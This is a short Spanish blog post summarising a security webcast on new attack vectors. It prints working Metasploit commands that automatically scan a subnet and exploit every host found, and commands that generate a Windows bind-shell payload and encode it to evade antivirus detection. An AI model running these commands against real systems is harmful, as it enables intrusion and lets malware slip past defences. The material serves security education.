Paul Asadoorian de
PaulDotCom presento un webcast sobre nuevos vectores de ataques llamado
"Late-Breaking Computer Attack Vectors".
El webcast tuvo los siguiente tópicos:
* MS08-067 - Slimy Network Worms
* Automated Metasploit - “autopwning"
* Listen to your keystrokes, they are talking to you
* Bypassing anit-virus software
* FAIL Of The Month (FOTM) (Linksys WRT300n vulnerabilities)
Estas son algunas notas de lo mas interesante:
*** Metasploit Autopwn
msf > load db_sqlite3
msf > db_create mynetwork
msf > db_import_nmap_xml mynetwork.xml
- o también -
msf > db_nmap -sS -T4 -O 192.168.1.0/24
msf > db_autopwn -p -e
*** Listen to your keystrokes, they are talking to youEste es un nuevo método para capturar las teclas tipeadas mediante las ondas electromagnéticas emitidas por los teclados.
*** Bypassing Anti-Virus SoftwareLo mas interesante de este webcast fueron algunos ejemplos sobre como evadir la detección de programas Anti-Virus.
En PASS #1 es creado un payload malicioso con Metasploit 3.2, que escaneado por
VirusTotal.com, es detectado por 1 de 36 AVs.
En PASS #2 el archivo payload.exe de PASS #1, es encodeado con msfencode, y el archivo resultante es detectado por 4 de 36 AVs!!
En PASS #3 el archivo payload.exe de PASS #1, es encodeado con
PE-Scrambler de Nick Harbour, y el archivo resultante es detectado por 1 de 36 AVs.
En todos los casos el único Anti-Virus que detecto todos los payloads fue el programa gratuito
AVG.
PASS #1
./msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe
PASS #2
./msfencode x86/shikata_ga_nai -i payload.exe -t exe > sgn-payload.exe
PASS #3
c:\Tools>PEScrambler.exe -i payload.exe -o pepayload.exe
* Link al Webcast - Link a los Slides
